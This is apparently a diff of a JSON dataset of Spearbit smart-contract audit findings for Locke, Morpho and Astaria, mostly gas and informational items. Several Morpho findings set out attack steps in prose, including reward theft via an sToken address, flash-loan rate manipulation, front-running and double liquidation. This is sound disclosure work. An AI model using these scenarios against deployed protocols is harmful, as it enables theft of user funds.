"https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Assume that users staked tokens at the beginning. The malicious stream creator could come and stake an extremely large amount of tokens thus driving up the value of totalVirtualBalance. This means that users will barely receive rewards while giving away deposit tokens at the same rate. Users can exit the pool in this case to save their unstreamed tokens. 13 function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * ,! depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } }", + "title": "isValidRefinance and related storage parameters can be moved to LienToken", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "isValidRefinance is only used in LienToken and with the current implementation it requires reading AstariaRouter from the storage and performing a cross-contract call which would add a lot of overhead gas cost.", "labels": [ "Spearbit", - "Locke", - "Severity: Low Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Moving check require(feePercent < 10000) in updateFeeParams to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "feePercent comes directly from LockeFactorys feeParams.feePercent, which is configured in the updateFeeParams function and used across all Stream contracts. Moving this check into the updateFeeParams function can avoid checking in every contract and thus save gas.", + "title": "auctionWindowMax can be reused to optimize liquidate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are mutiple instances of s.auctionWindow + s.auctionWindowBuffer in the liquidate func- tion which would make the function to read from the storage twice each time. Also there is already a stack variable auctionWindowMax defined as the sum which can be reused.", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Use calldata instead of memory for some function parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Having function arguments in calldata instead of memory is more optimal in the aforementioned cases. See the following reference.", + "title": "fileBatch() does requiresAuth for each file separately", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "fileBatch() does a requiresAuth check and then for each element in the input array calls file() which does another requiresAuth check. function fileBatch(File[] calldata files) external requiresAuth { for (uint256 i = 0; i < files.length; i++) { file(files[i]); } } ... function file(File calldata incoming) public requiresAuth { This wastes gas as if the fileBatch()'s requiresAuth pass, file()'s check will pass too.", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Update cumulativeRewardPerToken only once after stream ends", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Since cumulativeRewardPerToken does not change once it is updated after the stream ends, it has to be updated only once.", + "title": "_sliceUint can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_sliceUint can be optimized", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Expression 10**one can be unchecked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one)", + "title": "Use basis points for ratios", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Fee ratios are represented through two state variables for numerator and denominator. Basis point system can be used in its place as it is simpler (denominator always set to 10_000), and gas efficient as denomi- nator is now a constant.", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Calculation of amt can be unchecked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "The value newBal in this context is always greater than prevBal because of the check located at Locke.sol#534. Therefore, we can use unchecked subtraction.", + "title": "No Need to Allocate Unused Variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "LienToken._makePayment() returns two values: (Stack[] memory newStack, uint256 spent), but the second value is never read: (newStack, ) = _makePayment(_loadLienStorageSlot(), stack, amount); Also, if this value is planned to be used in future, it's not a useful value. It is equal to the payment made to the last lien. A more meaningful quantity can be the total payment made to the entire stack. Additional instances noted in Context above.", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Change lastApplicableTime() to endStream", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Since block.timestamp >= endStream in the abovementioned cases the lastApplicableTime function will always return endStream.", + "title": "Cache Values to Save Gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Calls are occurring, same values are computed, or storage variables are being read, multiple times; e.g. CollateralToken.sol#L286-L307 reads the storage variable s.securityHooks[addr] four times. It's better to cache the result in a stack variable to save gas.", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Simplifying code logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } 17 function currDepositTokensNotYetStreamed(IStream stream, address who) external view returns (uint256) { unchecked { uint32 timestamp = uint32(block.timestamp); (uint32 startTime, uint32 endStream, ,) = stream.streamParams(); if (block.timestamp >= endStream) return 0; ( uint256 lastCumulativeRewardPerToken, uint256 virtualBalance, uint112 rewards, uint112 tokens, uint32 lastUpdate, bool merkleAccess ) = stream.tokenStreamForAccount(address(who)); if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } } }", + "title": "RouterStorage.vaults can be a boolean mapping", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "RouterStorage.vaults is of type mapping(address => address). A key-value is stored in the mapping as: s.vaults[vaultAddr] = msg.sender; However, values in this mapping are only used to compare against address(0): if (_loadRouterSlot().vaults[msg.sender] == address(0)) { ... return _loadRouterSlot().vaults[vault] != address(0); It's better to have vaults as a boolean mapping as the assignment of msg.sender as value doesn't carry a special meaning.", "labels": [ "Spearbit", - "Locke", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Wrong P2P exchange rate calculation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "_p2pDelta is divided by _poolIndex and multiplied by _p2pRate, nevertheless it should have been multiplied by _poolIndex and divided by _p2pRate to compute the correct share of the delta. This leads to wrong P2P rates throughout all markets if supply / borrow delta is involved.", + "title": "isValidReference() should just take an array element as input", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "stack[position]: isValidRefinance() takes stack array as an argument but only uses stack[0] and function isValidRefinance( ILienToken.Lien calldata newLien, uint8 position, ILienToken.Stack[] calldata stack ) public view returns (bool) { The usage of stack[0] can be replaced with stack[position] as stack[0].lien.collateralId == stack[position].lien.collateralId: if (newLien.collateralId != stack[0].lien.collateralId) { revert InvalidRefinanceCollateral(newLien.collateralId); } To save gas, it can directly take that one element as input.", "labels": [ "Spearbit", - "Morpho", - "Severity: Critical Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "MatchingEngineForAave is using the wrong totalSupply in updateBorrowers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "_poolTokenAddress is referencing AToken so the totalStaked would be the total supply of the AToken. In this case, the totalStaked should reference the total supply of the DebtToken, otherwise the user would be rewarded for a wrong amount of reward.", + "title": "Functions can be made external", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If public function is not called from within the contract, it should made external for clarity, and can potentially save gas.", "labels": [ "Spearbit", - "Morpho", - "Severity: Critical Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "RewardsManagerAave does not verify token addresses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Aave has 3 different types of tokens: aToken, stable debt token and variable debt token (a/s/vToken). Aaves incentive controller can define rewards for all of them but Morpho never uses a stable-rate borrows token (sToken). The public accrueUserUnclaimedRewards function allows passing arbitrary token addresses for which to accrue user rewards. Current code assumes that if the token is not the variable debt token, then it must be the aToken, and uses the users supply balance for the reward calculation as follows: 5 uint256 stakedByUser = reserve.variableDebtTokenAddress == asset ? positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool : positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; An attacker can accrue rewards by passing in an sToken address and steal from the contract, i.e: Attacker supplies a large amount of tokens for which sToken rewards are defined. The aToken reward index is updated to the latest index but the sToken index is not initialized. Attacker calls accrueUserUnclaimedRewards([sToken]), which will compute the difference between the cur- rent Aave reward index and users sToken index, then multiply it by their supply balance. The user accumulated rewards in userUnclaimedRewards[user] can be withdrawn by calling PositionMan- ager.claimRewards([sToken, ...]). Attacker withdraws their supplied tokens again. The abovementioned steps can be performed in one single transaction to steal unclaimed rewards from all Morpho positions.", + "title": "a.mulDivDown(b,1) is equivalent to a*b", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Highlighted code above follow the pattern of a.mulDivDown(b, 1) which is equivalent to a*b.", "labels": [ "Spearbit", - "Morpho", - "Severity: Critical Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "FullMath requires overflow behavior", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "UniswapV3s FullMath.sol is copied and migrated from an old solidity version to version 0.8 which reverts on overflows but the old FullMath relies on the implicit overflow behavior. The current code will revert on overflows when it should not, breaking the SwapManagerUniV3 contract.", + "title": "Use scratch space for keccak", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "computeId() function computes and returns uint256(keccak256(abi.encodePacked(token, to- kenId))). Since the data being hashed fits within 2 memory slots, scratch space can be used to avoid paying gas cost on memory expansion.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Morphos USDT mainnet market can end up in broken state", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Note that USDT on Ethereum mainnet is non-standard and requires resetting the approval to zero (see USDT L199) before being able to change it again. In _repayERC20ToPool , it could be that _amount is approved but then _amount = Math.min(...) only repays a smaller amount, meaning there remains a non-zero approval for Aave. Any further _repayERC20ToPool/_- supplyERC20ToPool calls will then revert in the approve call. Users cannot interact with most functions of the Morpho USDT market anymore. Example: Assume the attacker is first to borrow from the USDT market on Morpho. Attacker borrows 1000 USDT through Morpho from the Aave pool (and some other collateral to cover the debt). Attacker directly interacts with Aave to repay 1 USDT of debt for Aaves Morpho account position. Attacker attempts to repay 1000 USDT on Morpho. the contracts debt balance is only 999 and the _amount = Math.min(_amount, variableDebtTo- ken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) computation will only repay 999. An approval of 1 USDT remains. It will approve 1000 USDT but The USDT market is broken as it reverts on supply / repay calls when trying to approve the new amount", + "title": "Define a named constant for the return value of onFlashAction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "onFlashAction returns: keccak256(\"FlashAction.onFlashAction\")", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Wrong reserve factor computation on P2P rates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The reserve factor is taken on the entire P2P supply and borrow rates instead of just on the spread of the pool rates. Its currently overcharging suppliers and borrowers and making it possible to earn a worse rate on Morpho than the pool rates. supplyP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS - reserveFactor[_marketAddress])) / MAX_BASIS_POINTS; borrowP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS + reserveFactor[_marketAddress])) / MAX_BASIS_POINTS;", + "title": "Define a named constant for permit typehash in ERC20-cloned", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In permit, the following type hash has been used: keccak256( \"Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)\" )", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "SwapManager assumes Morpho token is token0 of every token pair", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The consult function wrongly assumes that the Morpho token is always the first token (token0) in the Morpho <> Reward token token pair. This could lead to inverted prices and a denial of service attack when claiming rewards as the wrongly calculated expected amount slippage check reverts.", + "title": "Unused struct, enum and storage fields can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The struct, enum and storage fields in this context have not been used in the project.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "SwapManager fails at updating TWAP", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The update function returns early without updating the TWAP if the elapsed time is past the TWAP period. Meaning, once the TWAP period passed the TWAP is stale and forever represents an old value. This could lead to a denial of service attack when claiming rewards as the wrongly calculated expected amount slippage check reverts.", + "title": "WPStorage.expected's comment can be made more accurate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In WPStorage's definition we have: uint88 expected; // Expected value of auctioned NFTs. yIntercept (virtual assets) of a PublicVault are ,! not modified on liquidation, only once an auction is completed. The comment for expected is not exactly accurate. The accumulated value in expected is the sum of all auctioned NFTs's amountOwed when (the timestamp) the liquidate function gets called. Whereas the NFTs get auctioned starting from their first stack's element's liquidationInitialAsk to 1_000 wei", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "P2P rate can be manipulated as its a lazy-updated snapshot", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The P2P rate is lazy-updated upon interactions with the Morpho protocol. It takes the mid-rate of Its possible to manipulate these rates before triggering an update on the current Aave supply and borrow rate. Morpho. function _updateSPYs(address _marketAddress) internal { DataTypes.ReserveData memory reserveData = lendingPool.getReserveData( IAToken(_marketAddress).UNDERLYING_ASSET_ADDRESS() ); uint256 meanSPY = Math.average( reserveData.currentLiquidityRate, reserveData.currentVariableBorrowRate ) / SECONDS_PER_YEAR; // In ray } Example: Assume an attacker has a P2P supply position on Morpho and wants to earn a very high APY on it. He does the following actions in a single transaction: Borrow all funds on the desired Aave market. (This can be done by borrowing against flashloaned collateral). The utilisation rate of the market is now 100%. The borrow rate is the max borrow rate and the supply rate is (1.0 - reserveFactor) * maxBorrowRate. The max borrow rate can be higher than 100% APY, see Aave docs. The attacker triggers an update to the P2P rate, for example, by supplying 1 token to the pool Positions- ManagerForAave.supply(poolTokenAddress, 1, ...), triggering marketsManager.updateSPYs(_poolTo- kenAddress). The new mid-rate is computed which will be (2.0 - reserveFactor) * maxBorrowRate / 2 ~ maxBor- rowRate. The attacker repays their Aave debt in the same transaction, not paying any interest on it. All P2P borrowers now pay the max borrow rate to the P2P suppliers until the next time a user interacts with the market on Morpho. This process can be repeated to keep the APY high.", + "title": "Leave comment that in WithdrawProxy.claim() the calculation of balance cannot underflow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There is this following line in claim() where balance is initialised: uint256 balance = ERC20(asset()).balanceOf(address(this)) - s.withdrawReserveReceived; With the current PublicVault implementation of IPublicVault, this cannot underflow since the increase in with- drawReserveReceived (using increaseWithdrawReserveReceived) is synced with increasing the asset balance by the same amount.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Liquidating Morphos Aave position leads to state desynchronization", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Morpho has a single position on Aave that encompasses all of Morphos individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desynchronize from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. Its also possible to double-liquidate for a profit. Example: Theres a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho The ETH price crashes and the position becomes liquidatable. A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The users supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. The state remains desynced.", + "title": "Shared logic in withdraw and redeem functions of WithdrawProxy can be turned into a shared modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "withdraw and redeem both start with the following lines: WPStorage storage s = _loadSlot(); // If auction funds have been collected to the WithdrawProxy // but the PublicVault hasn't claimed its share, too much money will be sent to LPs if (s.finalAuctionEnd != 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } Since they have this shared logic at the beginning of their body, we can consolidate the logic into a modifier.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Frontrunners can exploit the system by not allowing head of DLL to match in P2P", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "For a given asset X, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x Whenever there is a new transaction in the mempool to borrow 100 units of x: Frontrunner supplies 1001 units of x and is supplied on pool. updateSuppliers will place the frontrunner on the head (assuming very high gas is supplied). Borrowers transaction lands and is matched 100 units of x with a frontrunner in p2p. Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: Relatively fewer gas fees & relatively high block gas limit. insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a blocks time period.", + "title": "StrategyDetails version can only be used in custom implementation of IStrategyValidator, requires documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "StrategyDetails.version is never used in the current implementations of the validators. If the intention is to avoid replays across different versions of Astaria, we should add a check for it in commit- ment validation functions. A custom implementation of IStrategyValidator can make use of this value, but this needs documentation as to exactly what it refers to.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "TWAP intervals should be flexible as per market conditions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The protocol is using the same TWAP_INTERVAL for both weth-morpho and weth-reward token pool while their liquidity and activity might be different. It should use separate appropriate values for both pools.", + "title": "Define helper functions to tag different pieces of cloned data for ClearingHouse", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_getArgAddress(0) and _getArgUint256(21) are used as the ROUTER() and COLLATERAL_ID() in the fallback implementation for ClearingHouse was Clone derived contract.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "PositionsManagerForAave claimToTreasury could allow sending underlying to 0x address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "claimToTreasury is currently not verifying if the treasuryVault address is != address(0). In the current state, it would allow the owner of the contract to burn the underlying token instead of sending it to the intended treasury address.", + "title": "A new modifier onlyVault() can be defined for WithdrawProxy to consolidate logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following require statement has been used in multiple functions including increaseWith- drawReserveReceived, drain, setWithdrawRatio and handleNewLiquidation. require(msg.sender == VAULT(), \"only vault can call\");", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "rewardsManager used in MatchingEngineForAave could be not initialized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "MatchingEngineForAave update the userUnclaimedRewards for a supplier/borrower each time it gets updated. rewardsManager is not initialized in PositionsManagerForAaveLogic.initialize but only via Po- sitionsManagerForAaveGettersSetters.setRewardsManager, which means that it will start as address(0). Each time a supplier or borrower gets updated and the rewardsManager address is empty, the transaction will revert. To replicate the issue, just comment positionsManager.setRewardsManager(address(rewardsManager)); in TestSetup and run make c-TestSupply. All tests will fail with [FAIL. Reason: Address: low-level delegate call failed]", + "title": "Inconsistant pragma versions and floating pragma versions can be avoided", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Most contracts in the project use pragma solidity 0.8.17, but there are other variants as well: 69 pragma solidity ^0.8.16; pragma solidity ^0.8.16; pragma solidity ^0.8.16; // src/Interfaces/IAstariaVaultBase.sol // src/Interfaces/IERC4626Base.sol // src/Interfaces/ITokenBase.sol pragma solidity ^0.8.15; // src/Interfaces/ICollateralToken.sol pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; // src/Interfaces/IERC20.sol // src/Interfaces/IERC165.sol // src/Interfaces/IERC1155.sol // src/Interfaces/IERC1155Receiver.sol // src/Interfaces/IERC721Receiver.sol // src/utils/Math.sol pragma solidity >=0.8.0; pragma solidity >=0.8.0; // src/Interfaces/IERC721.sol // src/utils/MerkleProofLib.sol And they all have floating version pragmas. In hardhat.config.ts, solidity: \"0.8.13\" is used. In .prettierrc settings we have \"compiler\": \"0.8.17\" In .solhint.json we have \"compiler-version\": [\"error\", \"0.8.0\"] foundry.toml does not have a solc setting", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Missing input validation checks on contract initialize/constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Contract creation/initialization of a contract in a wrong/inconsistent state. initialize/constructor input parameters should always be validated to prevent the", + "title": "IBeacon is missing a compiler version pragma", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "IBeacon is missing a compiler version pragma.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Setting a new rewards manager breaks claiming old rewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Setting a new rewards manager will break any old unclaimed rewards as users can only claim through the PositionManager.claimRewards function which then uses the new reward manager.", + "title": "zone and zoneHash are not required for fully open Seaport orders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "As per Seaport's documentation,zone and zoneHash are not required for PUBLIC orders: The zone of the order is an optional secondary account attached to the order with two additional privi- leges: The zone may cancel orders where it is named as the zone by calling cancel. (Note that offerers can also cancel their own orders, either individually or for all orders signed with their current counter at once by calling incrementCounter). \"Restricted\" orders (as specified by the order type) must either be executed by the zone or the offerer, or must be approved as indicated by a call to an isValidOrder or isValidOrderIncludingEx- traData view function on the zone. 70 This order isn't \"Restricted\", and there is no way to cancel a Seaport order once created from this contract.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Low/high MaxGas values could make match/unmatch supplier/borrower functions always fail or revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "maxGas variable is used to determine how much gas the matchSuppliers, unmatchSuppliers, matchBorrowers and unmatchBorrowers can consume while trying to match/unmatch supplier/borrower and also updating their position if matched. maxGas = 0 will make entirely skip the loop. maxGas low would make the loop run at least one time but the smaller maxGas is the higher is the possibility that not all the available suppliers/borrowers are matched/unmatched. maxGas could make the loop consume all the block gas, making the tx revert. Note that maxGas can be overriden by the user when calling supply, borrow", + "title": "Inconsistent treatment of delegate setting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Private vaults include delegate in the allow list when deployed through the Router. Public vaults do not. The VaultImplementation, when mutating a delegate, sets them on allow list.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "NDS min/max value should be properly validated to avoid tx to always fail/skip loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "PositionsManagerForAaveLogic is currently initialized with a default value of NDS = 20. The NDS value is used by MatchingEngineForAave when it needs to call DoubleLinkedList.insertSorted in both updateBorrowers and updateSuppliers updateBorrowers, updateSuppliers are called by MatchingEngineForAavematchBorrowers MatchingEngineForAaveunmatchBorrowers MatchingEngineForAavematchSuppliers MatchingEngineForAaveunmatchSuppliers Those functions and also directly updateBorrowers and updateSuppliers are also called by PositionsManager- ForAaveLogic Problems: A low NDS value would make the loop inside insertSorted exit early, increasing the probability of a sup- plier/borrower to be added to the tail of the list. This is something that Morpho would like to avoid because it would decrease protocol performance when it needs to match/unmatch suppliers/borrowers. In the case where a list is long enough, a very high value would make the tranaction revert each time one of those function directly or indirectly call insertSorted. The gas rail guard present in the match/unmatch supplier/borrow is useless because the loop would be called at least one time.", + "title": "AstariaRouter does not adhere to EIP1967 spec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The Router serves as an implementation Beacon for proxy contracts, however, does not adhere to the EIP1967 spec.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Initial SwapManager cumulative prices values are wrong", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The initial cumulative price values are integer divisions of unscaled reserves and not UQ112x112 fixed-point values. (reserve0, reserve1, blockTimestampLast) = pair.getReserves(); price0CumulativeLast = reserve1 / reserve0; price1CumulativeLast = reserve0 / reserve1; One of these values will (almost) always be zero due to integer division. Then, when the difference is taken to the real currentCumulativePrices in update, the TWAP will be a large, wrong value. The slippage checks will not work correctly.", + "title": "Receiver of bought out lien must be approved by msg.sender", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The buyoutLien function requires that either the receiver of the lien is msg.sender or is an address approved by msg.sender: if (msg.sender != params.encumber.receiver) { require( _loadERC721Slot().isApprovedForAll[msg.sender][params.encumber.receiver] ); } This check seems unnecessary and in some cases will block users from buying out liens as intended.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "User withdrawals can fail if Morpho position is close to liquidation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool (\"hard withdraw\"). If Morphos position on Aaves debt / collateral value is higher than the markets maximum LTV ratio but lower than the markets liquidation threshold, the borrow will fail and the position cannot be liquidated. Therefore withdrawals could fail.", + "title": "A new modifer onlyLienToken() can be defined to refactor logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following require statement has been used in multiple locations in PublicVault: require(msg.sender == address(LIEN_TOKEN())); Locations used: beforePayment afterPayment handleBuyoutLien updateAfterLiquidationPayment updateVaultAfterLiquidation", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Event Withdrawn is emitted using the wrong amounts of supplyBalanceInOf", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Inside the _withdraw function, all changes performed to supplyBalanceInOf are done using the _supplier address. The _receiver is correctly used only to transfer the underlying token via underlyingToken.safeTransfer(_- receiver, _amount); The Withdrawn event should be emitted passing the supplyBalanceInOf[_poolTokenAddress] of the supplier and not the receiver. This problem will arise when this internal function is called by PositionsManagerForAave.liquidate where sup- plier 